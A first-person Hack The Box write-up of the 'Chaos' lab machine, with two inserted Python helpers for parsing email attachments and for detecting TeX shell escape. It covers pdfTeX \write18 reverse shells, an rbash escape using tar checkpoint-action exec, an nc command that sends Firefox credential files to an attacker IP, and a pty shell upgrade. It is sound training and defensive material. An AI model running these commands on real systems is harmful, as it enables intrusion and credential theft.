Hack the Box - Chaos

pwned: 20/02/2019

Today I pwned the Chaos box on Hack The Box. It was my first one, and I probably made a mistake as this one is a little crazy.

I will go through my enumeration process at each stage, output of good checkpoint commands and the method I used to root the machine.

Initial Enumeration.

Very similar to most machines - a detailed nmap scan to see services using the following command:

nmap -sV -sC -p 1-65535 -A -v 10.10.10.120

This produced the following output:
Nmap scan for 10.10.10.120

We see a few interesting ports here that can tell us information:

  • 80: There is a web server, and we can try accessing it in a browser.
  • 110: A POP3 mail server running Dovecot.
  • 143: An IMAP mail server running Dovecot.
  • 993: An SSL connection to the IMAP mail server.
  • 995: An SSL connection to the POP3 mail server.
  • 1000: Webmin server, which can also be accessed via the browser.

First things first, let’s try accessing it from the browser.

What we see when entering the web server for the first time

Okay, so we can’t access this website via the ip address. So how else do we access websites?
By using a qualified name. How do we bind an ip address to a qualified domain name?
I edited the /etc/hosts file to point 10.10.10.120 to chaos.htb, and this is what I saw:

So far so good, but after poking around this website and the source, I couldn’t really find anything interesting. Time to fire up dirb using:

dirb http://10.10.10.120/ /usr/share/wordlists/dirb/common.txt

The WordPress Rabbit Hole

After running dirb, I found that the website contained a WordPress site. I fired up wpscan to find directories and enumerate possible usernames and passwords.

The dirb revealed a wordpress site, with a single author - Human

This brought me to a WordPress site with a password protected post. I ignored this for now, and spent at least 2 hours trying to brute force or break my way into the WordPress admin control panel, as I usually do, as I was positive this was the answer. This is why I called this the rabbit hole, as it was ultimately a dead end.

I then turned my attention to the password protected post. After looking at the forum thread on HTB, one user said that zero brute force was required. This means that the password was something logical.
Here's what I tried:

  • Viewed source for hints - No results
  • Viewed BurpSuite repeater output for hints - No results

I noticed one thing missing that I usually see on WP posts - the author. As a hail mary I entered the author's name as the password.

I now had the credentials for webmail. I immediately assumed this meant the POP3/IMAP mail servers, so I had to study how to talk to these servers. It turns out you can just telnet into them and use some Dovecot formatted commands to log in as a user.

I tried to log in as ayush to the Dovecot POP3 server using telnet, however it told me that authentication would not be allowed using plaintext. I thought for a moment, and realized it was obvious - I was using telnet, which transmits in plain text.

I then did some more research on SSL clients that can connect to a port, and came across s_client from openssl. I used s_client to connect to the ssl port of pop3 this time (995) using:

openssl s_client -connect 10.10.10.120:995

I finally logged in with some Dovecot commands, but it took me quite a while to get the hang of the commands.

Eventually I stumbled across an email in the Drafts folder and fetched it from the s_client session using:

a fetch 1 body[text]

So this email had 2 attachments - a text file named enim_msg.txt, which was encoded in base64 as shown by the Content-Transfer-Encoding: base64 header, and a Python file called en.py.

I decoded the enim_msg.txt from b64, and it ended up being encrypted. Which was expected as the email said it was encrypted.

I then decoded the en.py file and opened it in my IDE:

This seemed to be just an encryption function. I assumed that I needed to develop the decrypt function. While I do know programming in Python, I only have very little experience with the PyCrypto library (which was what was being used here), especially with padding byte strings for use in Cipher Block Chaining (CBC) mode. So I did some research.

After a decent chunk of time, I decided to google a snippet of the encryption function in case it was used elsewhere. Lo and behold, the exact same encryption function was in a popular GitHub repo, and it included the exact decryption function that I also needed. I also hate to mention that I was stuck after this step anyway because I included the text that starts with –= in my to-be-decrypted file, which I realized was just a signature/EOF delimiter. RIP 30 mins to that.
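As an added example (not code from the original post or the box), here is how the two base64 attachments described above can be pulled out of the message with Python's standard email module instead of being cut out of the s_client output by hand, which is exactly where the –= delimiter sneaked into the file. The message and the attachment contents are constructed stand-ins; the boundary line is never part of the decoded payload.

```python
import base64
import email
from email import policy

# Constructed sample attachment contents; these are not the files from the box.
SAMPLE_ENIM_MSG = b"\x8a\x11not-real-ciphertext\x00\xff"
SAMPLE_EN_PY = b"def encrypt(key, filename):\n    pass  # stub\n"


def build_sample_email() -> str:
    """Build a constructed multipart/mixed draft shaped like the one on the box."""
    b64_msg = base64.b64encode(SAMPLE_ENIM_MSG).decode()
    b64_py = base64.b64encode(SAMPLE_EN_PY).decode()
    return (
        "From: ayush@chaos.htb\n"
        "To: sahay@chaos.htb\n"
        "Subject: enim_msg\n"
        "MIME-Version: 1.0\n"
        'Content-Type: multipart/mixed; boundary="----=_Part_SAMPLE"\n'
        "\n"
        "------=_Part_SAMPLE\n"
        "Content-Type: text/plain; charset=utf-8\n"
        "\n"
        "Encrypted message attached. YOU are the password.\n"
        "------=_Part_SAMPLE\n"
        'Content-Type: text/plain; name="enim_msg.txt"\n'
        "Content-Transfer-Encoding: base64\n"
        'Content-Disposition: attachment; filename="enim_msg.txt"\n'
        "\n"
        f"{b64_msg}\n"
        "------=_Part_SAMPLE\n"
        'Content-Type: text/x-python; name="en.py"\n'
        "Content-Transfer-Encoding: base64\n"
        'Content-Disposition: attachment; filename="en.py"\n'
        "\n"
        f"{b64_py}\n"
        "------=_Part_SAMPLE--\n"   # closing boundary: MIME structure, not file data
    )


def extract_attachments(raw_message: str) -> dict:
    """Return {filename: decoded bytes} for every attachment in a raw RFC 822 message.

    The parser strips the boundary lines and undoes the base64
    Content-Transfer-Encoding, so the bytes are exactly the attached file.
    """
    msg = email.message_from_string(raw_message, policy=policy.default)
    attachments = {}
    for part in msg.iter_attachments():
        name = part.get_filename()
        if name:
            attachments[name] = part.get_payload(decode=True)
    return attachments
```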

Now, reading back the email, Ayush said "YOU are the password". I figured out pretty quickly that the password was probably 'sahay' then. I then used that as the key to decode the msg file.

As expected, this message was b64 encoded again. A quick decode using:

base64 -d decrypted_msg_d > decrypted_msg_final

led to the decrypted message.
So, now we have a new link on that website that could not possibly be found by dirbusting. After navigating to it and inspecting it in BurpSuite, we can see that it is an app called pdfTeX, which is a PHP app that can convert LaTeX to PDF.

This led me to googling for exploits or vulnerabilities, and it turns out pdfTeX actually executes commands in the host environment in order to convert the file, and direct commands can be written with the \immediate\write18{} TeX line. As we can see from the output above, write18 was enabled, which was a clear vector for a reverse shell.
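As an added defensive check (not part of the original post or of the converter on the box), here is a small Python scanner that flags the shell-escape primitives in a submitted .tex file before it is handed to pdfTeX, together with a pdflatex invocation that keeps shell escape off whatever texmf.cnf says; the sample document is constructed.

```python
import re

# TeX primitives that reach the host shell when shell escape is enabled:
# \write18{cmd} runs cmd; \input|"cmd" and \openin\f=|"cmd" read cmd's output.
SHELL_ESCAPE_PATTERNS = [
    (re.compile(r"\\write\s*18(?!\d)"), "\\write18 shell command"),
    (re.compile(r"\\input\s*\{?\s*\|"), "piped \\input"),
    (re.compile(r"\\openin[^\n|]{0,40}\|"), "piped \\openin"),
]

# Constructed sample submission (not the payload used on the box); lines 4 and 5 are hits.
SAMPLE_TEX = r"""\documentclass{article}
\begin{document}
Hello from a converter test.
\immediate\write18{echo shell-escape-test}
\input|"date"
\end{document}
"""


def find_shell_escape(tex_source: str) -> list:
    """Return (line number, description) for every line using a shell-escape primitive.

    Lines inside % comments are flagged too: a submission can change catcodes,
    so a conservative scanner does not try to decide what TeX will ignore.
    """
    findings = []
    for lineno, line in enumerate(tex_source.splitlines(), start=1):
        for pattern, label in SHELL_ESCAPE_PATTERNS:
            if pattern.search(line):
                findings.append((lineno, label))
    return findings


def pdflatex_command(tex_path: str, output_dir: str) -> list:
    """argv for a conversion run with shell escape switched off on the command line."""
    return [
        "pdflatex",
        "-no-shell-escape",          # turns shell escape off regardless of texmf.cnf
        "-halt-on-error",
        "-interaction=nonstopmode",  # never wait on an interactive prompt
        f"-output-directory={output_dir}",
        tex_path,
    ]
```

A converter that rejects any submission with findings and still runs with -no-shell-escape has two independent layers, so a scanner miss alone does not hand out command execution.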

There were a few things I tried. First, I tried entering a direct nc shell to myself. This didn't work, as I assume that the host did not have nc installed.

Next, I tried to run a PHP reverse shell that I got from a reverse shell cheat sheet. I also had to encode the entire command using a URL encoding service online, and this worked, but closed the connection straight after.

I tried running this a few more times, but nothing worked. Eventually, I tried the Python reverse shell one-liner. I encoded this too.

And finally, after some trial and error, I had a reverse shell as the www-data user.
PrivEsc

Now I felt that the machine had moved away from CTF-like challenges and was on to some privilege escalation.
I managed to get a user shell quite quickly, as my first step of enumeration for a low-priv shell is to read /etc/passwd.
This revealed a list of users (and hopefully a password). Ayush was on that list, a user I already had a password for if he had been lazy.
So I tried logging in as him with the same credentials, and it worked.

But there was a problem: I was in a restricted bash (rbash) shell, and seemingly the only command available to me was cd.
I then studied a completely new topic, escaping a restricted shell, and found this incredible document from Exploit DB that lists a few techniques:
https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

This had all the information I needed, so I tried each command one by one to see if I had access to it, and noticed that I could use the tar command. So, I followed that PDF and typed in:

tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/sh

I couldn't believe it actually worked; I now had an unrestricted shell. But for whatever reason, I still could not use commands like ls. I ran them directly by their full path using the following workaround:

$ /bin/ls -la

This worked. So then I navigated to my home directory and found the user flag.

Next, I had a look around the user's home directory, showing all files using the above command again.

I had to get some help with hints here, as the hints suggested that the root flag is within the same directory as the user flag. So I knew it had to be in here somewhere. I found a .mozilla folder, and wondered if there were possibly some saved logins stored, as I knew that Mozilla stores passwords in an SQLite database.

Sure enough, I found a Mozilla profile, and the logins.json and key4.db files that I needed.
I had to google how to restore Mozilla profiles and carry them across computers, as I had no experience doing so. In my research, I found out that you only need the logins.json and key4.db files: just copy them into another profile or your own profile, and that's all you need to do.

I tried to cat each file and then copy and paste its contents into a file using echo, but that didn't work.
I then did some more research on how I can transfer files via a reverse shell, and found a way using netcat: you set up a listener on the attacker machine that pipes to a file, and set up a connection from the host that reads the file. I used the following commands:

Client:

nc -l -p 5556 > logins.json

Host:

/bin/nc -w 3 10.10.12.163 5556 < logins.json

And then the same for the key4.db file. This worked.
I then transferred those 2 files across, overwriting my current Firefox profile (it was just the Burp Suite Firefox, so there was nothing saved), and checked my saved logins.

Sure enough, the details were there in plain text.
I then went back to my www-data reverse shell and tried to sign in as root, but I couldn't sign in without an interactive TTY. So I googled shell upgrades, and found a Python one-liner:

python -c 'import pty; pty.spawn("/bin/sh")'

This worked great. Then I just logged in to root as normal with su, put in my new password, and found the flag.
Conclusion

All in all, an absolutely crazy box for my skill level (which is near 0 at the moment), but I learned an astronomical amount about new enumeration techniques, escaping restricted shells, enumeration for priv esc, as well as how to avoid traps.